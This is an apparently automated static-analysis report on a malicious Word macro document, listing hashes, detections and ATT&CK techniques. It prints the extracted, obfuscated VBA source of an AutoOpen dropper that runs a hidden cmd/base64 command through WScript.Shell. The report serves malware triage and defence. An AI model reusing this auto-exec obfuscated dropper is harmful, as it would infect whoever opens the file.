Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2416204d20ab401b…

MALICIOUS

Office (OLE)

Size: 85.9 KB
Created: 2018-08-23 06:15:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 87b77cba5f5f727fd4680636d6571563
SHA-1: 5b0fa8ecbe130db5753105b2004d4091e14b7b6e
SHA-256: 2416204d20ab401b02be26fd5c85852c220dc243a85eccc85fbec37489caed99
Risk score: 310

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an attempt to execute arbitrary commands. The presence of an AutoOpen macro suggests automatic execution upon opening the document. The primary function of the script appears to be downloading and executing a second-stage payload, as evidenced by the critical heuristic firings for Shell() and WScript.Shell usage.

Heuristics (10)

  • ClamAV: Doc.Malware.Ddma-6691546-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ddma-6691546-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
       Error 19554 * sjqITJ / 83673 * GLudVL
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
       Error nwMhrw / EjdtzF
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
       Error 19554 * sjqITJ / 83673 * GLudVL
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
       Error nwMhrw / EjdtzF
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "DUcAahTi"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10174 bytes
SHA-256: 2f462063740cc6f749ffe21d76caa565ee21399bab85482d9904aef7e8fe8ec7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 227 identifiers look randomly generated (e.g. 'ndsCifZXXbKzbi'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hVjmXUfjsT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TlGDwozEkCdrB"
Function YJzAntBCW()
On Error Resume Next
Error jZQhW / 6012 / 75010 * TSBRw
   Error TDOUc / sFalDk
   Error 86899 * hbpawV
UGUXAz = "MD /v^" + ":^" + "  ^ ^  " + " /r  " + " " + CStr(Chr(GcqwpJaKI + ndsCifZXXbKzbi + 34 + VpFFiKWwmlETb + pMnPirYnG)) + "  ^" + "s^Et" + " " + "P^" + "d=^="
Error 93843 * hsjdkz
rTJjc = "=^A" + "^A" + "gAAIA^" + "A" + "C^A^gA" + "AI" + "AACA" + "^gAA^I^" + "AAC^"
Error wZMYZw * zYFtQd * 59388 * niiiO
   Error GjwTL * SlisVr
   Error 95089 / DOuNI * 1460 * vQJOz
XqncitJXktd = "A^g^AAI" + "^AAC" + "Ag^" + "AAI" + "A^AC^" + "Ag" + "^A^AI^A" + "^0" + "^H^A^9B" + "^w^e" + "AgG"
Error 96959 / hrOnNj * vVbZD * 24619
   Error 50352 * lJKqa
   Error 6883 * wVlRkC / 83251 / Clwqz
jsfBvXPvORl = "Aj^" + "B" + "^A^d^AE" + "^" + "G" + "^AjB^" + "Qf^" + "AsD^ArB" + "Q^Y^A"
Error 76623 * DSYCU * QWCUw / czjGHU
   Error OcOsj / pnHPc * 25901 / MKEWwk
qDQQicdr = "^U^GA^y" + "B^gY" + "AsD^AzB" + "^gY^A" + "^0E^" + "A^" + "k" + "^A^AI"
YJzAntBCW = UGUXAz + rTJjc + XqncitJXktd + jsfBvXPvORl + qDQQicdr
   Error LZwLE / pomcFS
   Error vTdsU / 44546 / MIRBjN * QqQsN
   Error zHzFJR / jOhTi
End Function
Function hqNLz()
On Error Resume Next
Error 34002 / ndMoLK / TMrsmA * ZPVCjf
   Error 62940 * QbvYVo
   Error dbhDul / hEZDzQ * 46507 / aVmUk
fvnQDbpw = "^A0^G^A" + "l" + "^BA" + "dA" + "^"
Error 55856 / KJAXB * 77114 * PiWIAm
   Error zuQbwM * tHHNJm
VrKcfjhd = "k" + "EA^t^" + "A" + "Q^Z^" + "A^s^GA" + "vB" + "gdA^" + "4^" + "GAJ" + "B^w^"
Error 75202 * jPuujf / jwlim * mErmYW
SoswLiMPfIT = "OAkCA" + "zB^gY^" + "A^" + "0E" + "Ak" + "AAI^A^" + "w"
Error 66932 * bduoC
   Error 84803 * zBzbE * 54251 * uVaWD
pazpalz = "CA" + "vBg^eAw" + "^GAk" + "AA" + "^KAU^" + "GA^s" + "^B^Q"
Error ZrjKMH * YBwzi * WdWCAM * fMCnl
   Error WGYSV * ISQHit / 52776 * 14239
   Error jIJRz / HopGiY * rzTGG / pLLpn
   Error 55687 * kEIznP * KrGvtm / CHsqJ
pjkfSickd = "aAYEA" + "k^BQY^A" + "8^G" + "A" + "^sB"
Error 57359 / shDNPX * 12216 * NzWwUM
   Error 38468 / RPcti
   Error aOFRX / PNZpj
   Error 7208 / YQjMo / pbHJN * sZcEuS
YFQHjOwTCdV = "g^" + "b^AcH^A" + "v" + "^B" + "AR" + "^A^4C^A" + "YBg" + "^" + "d^Ac" + "HAk^Aw"
Error 23376 / kkBNB
   Error iwmAS / NAhJYi / loLrit * onPjp
   Error 17587 * bOzYFX / 458 / MYSudt
   Error 98075 / ljqtM * 81682 / 82083
homHA = "e" + "^AkH" + "Ay^B" + "^A^dA" + "s^HA^p^" + "AA"
hqNLz = fvnQDbpw + VrKcfjhd + SoswLiMPfIT + pazpalz + pjkfSickd + YFQHjOwTCdV + homHA
   Error YTKzZJ * HwSLza
   Error iSvNl / CEPRYC
   Error 34466 * fXvZJj * 14523 * UviCLY
End Function
Function ZNJizjw()
On Error Resume Next
Error 18655 * uOCUL * SUWmn * qYIGYm
HtrBuYTCi = "^a^As^" + "EA^" + "M^B^A^J" + "^A^ACAu" + "^B^Q^a" + "^A^AC^" + "Av^Bg^e" + "Aw^" + "GAkAA" + "KA^g^G"
Error awLAa * zDbOqI / dSzZz / VTwzbj
   Error GimlH * jwpok
   Error 38241 / ivzEZj
   Error 30226 / tiWOu / AGjJoF / 32748
MLipMAnz = "Aj^B" + "Q" + "Y^AU" + "GAy^Bw" + "bA^YG^A" + "7A^wJ^A"
Error 77883 * PbpDz
   Error knsSW / ZJfWqE * isAFG / 44037
   Error 22232 / HiPDc * kQGbtZ * dikifc
ZKwlJC = "U^G" + "^A^4^B^" + "Q" + "Z^A^4" + "CAnA" + "wK^A" + "o^F^A^H" + "B^"
Error 2153 / lCbwSn / YCMGV * BGSzJb
SsOMwEnPTF = "QbA^QC^" + "Ar^AwJ" + "Aw^F" + "^An" + "^A^wK^A" + "M" + "GA^pB" + "A"
Error 74994 / 400 * GYwMib * Kmmvvq
   Error VRznr / NFwwn
   Error 23308 * 27080
   Error EUZWbj / aBUjrG * 31569 * 90074
lwTSrkwt = "bA^IG" + "A1" + "B^Ac^A" + "^o^D" + "^A^" + "2B" + "^g^b" + "^A^"
Error FlMzM / MQclJ
hSrwnJzQ = "UGA^kA^" + "Q^P^A^" + "M^H^A" + "i^B" + "^QTA" + "QC" + "A7^A" + "wJ^AkD" + "^A3^AQ" + "NA" + "c"
Error habJC * PDJIN / 51104 / lzMjk
   Error ZUjBr / XkNszw / mfjlGZ / uwjzXd
   Error 12064 * EFSnGJ / 16736 * 75003
UwSrHN = "CA^g^" + "AQ^P" + "^A" + "^AC^A^" + "a^B" + "^wR^"
Error SNkfp * LPjQF
   Error ZKQXao * dNmqvU
   Error 77957 / dYtDmM
PBvZzSq = "A^0G^" + "Ak^A^w^" + "O" + "A^" + "kC^A" + "n^A" + "^AQ^" + "Ac" + "C^Ao"
Error EaujVB / LvQmfO * wZHRZv / TwPZB
   Error nzTmL / MrPJPm / unbWS * NcjMX
tjdof = "^A^A" + "^d" + "^A^k^G^" + "A^s" + "B^Ac" + "^A" + "M^F"
Error 43531 / qDSPDY / wQZlbi / Uqbjo
   Error EzCMbb * LvZUca * zsuYis * 95308
   Error HnvbPj * zjnNAw
cJFBDUbcWA = "A^uAw" + "^JA^Y^" + "F^A^0" + "^Agc^A^" + "U^GA" + "K^BQM^" + "AkD^A" + "v^A" + "^A^d^A" + "U^GA^"
Error QzEbX / jLFkst / 17370 * CJFLp
   Error Kiczs * rwlcKq / hKOuuY * BEIFsv
   Error 95382 * SVSWY / KtwlE * DbzQm
VHwJfWSzU = "u^B^g" + "LAc^GA^" + "u" + "^BQa" + "^A^" + "s^G^" + "A^jB" + "Q" + "YA^g^" + "G^" + "Au^B" + "^" + "gc^"
Error 19858 / aWFwT / dtXNsA * tmQPEC
   Error 69467 * XocmH
   Error rEzzo / QbdfU / PUIhDT / suKRQ
EPdqImLuY = "AEG" + "A" + "lB" + "^" + "AbA^4" + "CA" + "^kB^A^" + "Z^A^"
Error pIRnl * nGcQF
   Error 39829 * SwzHt * MiXWZ * QTjjFM
   Error bWcChs * CDBJOC
   Error hRiwqF * jBwla
NwbzWw = "8^GAv^" + "AwL^AoD" + "A^" + "w^B^A^" + "d^A^" + "Q" + "HAo^" + "B^AQ^A^" + "gD^A3A^" + "wQA" + "^U^H^" + "A^GB" + "AeA8C^A"
ZNJizjw = HtrBuYTCi + MLipMAnz + ZKwlJC + SsOMwEnPTF + lwTSrkwt + hSrwnJzQ + UwSrHN + PBvZzSq + tjdof + cJFBDUbcWA + VHwJfWSzU + EPdqImLuY + NwbzWw
   Error 72455 * LNkPG
   Error MKwnK / boZzKo / 31181 / lckQi
   Error 40897 * MOuNVL
   Error 39107 * jNCoj / 92125 * wZBVJ
End Function
Function MFUYYiizJu()
On Error Resume Next
Error Qzisw / Qwohz / 51624 / kfSPLF
   Error 9490 * nrnEdv / 60951 / LzRFa
TzEwlON = "t^B^wb" + "A^MGA" + "u" + "A^QZAAH" + "^" + "AvBAa^"
Error 17374 * kziBz / 89377 / Klcjz
Znnwhu = "AsGA" + "^y^" + "B^Q^aA" + "^sGAtB^" + "Q^aAQ^H" + "^A^u^" + "AAd" + "A^M" + "^HA^lB" + "Ad" + "^A^8CA"
Error zkXrnD / fiJkFi * SUQSRQ * 89366
   Error IHWvzX / UzjfiC * UiXHpz * OTQCTW
cbckqEMd = "vA^g^O^" + "A" + "A" + "H" + "^A0^BAd" + "^A^g^GA" + "ABwZAk" + "^DApB^"
Error ditnG / 86234 / AQWCwI * PqXCoz
inistzWwkic = "w^T^AYG" + "A1A" + "^" + "wL" + "^A^0^G" + "^AvB^wY" + "^A4CAp" + "B^w^Y" + "AcGA" + "^hBAZ" + "^A^I"
Error JJYpd * pIfTMd
   Error jBwmB * zDlsF
wlriSO = "H" + "A" + "^1B^" + "wZ^A" + "^o" + "H" + "Av^B^g^" + "L" + "A8G"
Error izTUC * AhjIw
   Error MPzrc / vXOizp
   Error rWvNlT / mKGdu / SQGCY / 20082
NrqPOuZka = "As" + "^" + "B^Q^a^" + "A^YGA" + "^j^B^" + "Q" + "^YA" + "^I^H^" + "A^h"
Error 28760 / JFstj / 25735 * btiNN
mIvCiYWr = "^Bw^LA" + "8CA^6A" + "^AcAQH" + "A^0" + "^B" + "^A" + "^a^" + "AA^E" + "A" + "3" + "^"
Error PQTihQ * 71606 / aDGlX * rVzuYi
   Error 75912 / UZFjNE / 95359 / TIqzG
   Error 96305 * PPGBJL / 90877 / 48608
FasSU = "B^" + "w^LAw^G" + "A^w^B^g" + "L^A^Q" + "^G^" + "A" + "^0A^Q^" + "YA^" + "U^GA" + "nBwbA^" + "I" + "^"
Error wclAu / isHJn / 26751 * 2001
ZVDQADkIEK = "H^Aw^B^" + "w^L" + "^A^8C" + "A6^A^Ac" + "^AQ^H" + "^A^" + "0B^A" + "aAA^E" + "A^h^" + "B" + "^g" + "YA^8C" + "AtBw^b^"
Error 55605 / 87463 / 74667 / hBkOjs
   Error 11343 / nqvuNb / RjISG / UbIIZ
   Error 46063 * fzFbhY
oiLcvjkqDV = "A^M^G" + "Au^A^w" + "c^AcGA^" + "uB^" + "Qa" + "AY^HAh" + "^B^wcAk" + "HAn^Bg" + "cAUGAuB" + "Q^" + "ZA" + "^w" + "G^"
Error Zwrpp * LOFUz
   Error UVOjJF / TLBJPp * 17384 / CVisFA
   Error 17880 * fmEzLK / YiQRjw * PTEpOv
   Error 42955 * BmCKG / 48002 * 48358
koWcEpGzJF = "AhB" + "^wY^" + "A4G" + "A" + "^y" + "^BQ^Z" + "^A^g^G" + "A^0^B" + "^QdA8^G" + "A^z^BwL" + "A^8C^" + "A^6"
Error MnAWAc * BSllY / 83525 * GuOYA
   Error 30 / TLkqFo
zwPShswRRrj = "AAc^AQ" + "^" + "HA0^B" + "AaAc" + "CA^9" + "^" + "A^Aa^A" + "^s" + "^EA^M" + "B^A^J" + "A^s"
MFUYYiizJu = TzEwlON + Znnwhu + cbckqEMd + inistzWwkic + wlriSO + NrqPOuZka + mIvCiYWr + FasSU + ZVDQADkIEK + oiLcvjkqDV + koWcEpGzJF + zwPShswRRrj
   Error TbhMcw / bDIFpb
   Error Ywwuuk * wIbZSv * CqzVWF / iRlzS
   Error 27099 / GmKizZ * 85956 * pjpUI
End Function
Function ZOkwWAJDMS()
On Error Resume Next
Error 41038 / kQlCIq * NfIcc / kDdrj
Hvmfd = "^D^A^0B" + "^gbAU^G" + "^A^" + "pBAbA^M" + "^" + "E^" + "Ai^B^QZ" + "^A" + "c^F" + "A^uA^" + "A^d"
Error IhsjLU / 69250
   Error cwEjh * bbGCm
   Error UFbNu / NzbZjd
hmalo = "A" + "^UG^A^O" + "^B" + "AIAQ" + "H^AjBQ^" + "Z^AoG" + "^A^i^B" + "w^" + "bA^0C^"
Error iwtnnY * aREOkT * YZJdm / 7029
   Error 23905 / FXXMVN / iNfvsi / ivSXKW
   Error rzQpAf / Awdabc / 96007 * DUCMT
   Error 18700 / QDitz * 21662 * uvwApw
   Error 18349 * 79432
   Error 31757 / jRwXv / 61058 / mEtLQT
TzqmfbVD = "A3B^QZ" + "A4" + "G" + "A^9" + "AAW^AY"
Error 69776 / DXKQww / 71697 / 80320
   Error udSKrH * Edzlhf * 23231 * DVZRK
ohjCdqal = "HA^" + "3^B" + "^AJ " + "e^" + "- ^l" + "^le^h^s" + "r^e^" + "wop&& " + " " + " ^f^" + "O"
Error zFXIj / cwsaOZ / 35151 * nQSjZS
   Error sHlcp / WARaup
   Error owZqR * jPmjr
   Error ciCDzX * 39098 * 51231 * vzzCj
NDFYhzVlMI = "r /^L " + "%^o ^" + "iN ( 9" + "^9^7" + "^ ^-1 ^"
Error AcsjJP * KKfvO / OPQXN * HOQWt
   Error WNArT / 44053
zwpajZisYCw = "0)  d^" + "o " + "   ^s" + "^et" + " " + "  ^pR" + "^U" + "D" + "=" + "!" + "^pR^" + "UD!!"
Error vfsJZ / vNwaO * BuVOmd * BIzjT
zuNPKshjm = "P^d:~ " + "   %^" + "o, 1!" + "&&i^F %" + "^o   ^L" + "E^" + "Q ^0 " + " C^A^L"
Error mrtzw * DDHfd / 83224 * qOoQqw
   Error QkFwY / NdfRW / sOATq / jzNtC
XiBsQwsiEhA = "l  " + "%" + "^pR^UD" + ":^~^ ^" + "-^9^9^8" + "% " + "  " + CStr(Chr(JqwdOPQREVCzO + uPzaGvaJ + 34 + oTuAwCziuAfBJ + DKswnOYmYzJpf)) + "    "
ZOkwWAJDMS = Hvmfd + hmalo + TzqmfbVD + ohjCdqal + NDFYhzVlMI + zwpajZisYCw + zuNPKshjm + XiBsQwsiEhA
   Error 63979 / HisKWW
End Function


Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
   Error EYHSt * oNCwD / 50375 * TGfFQW
End Sub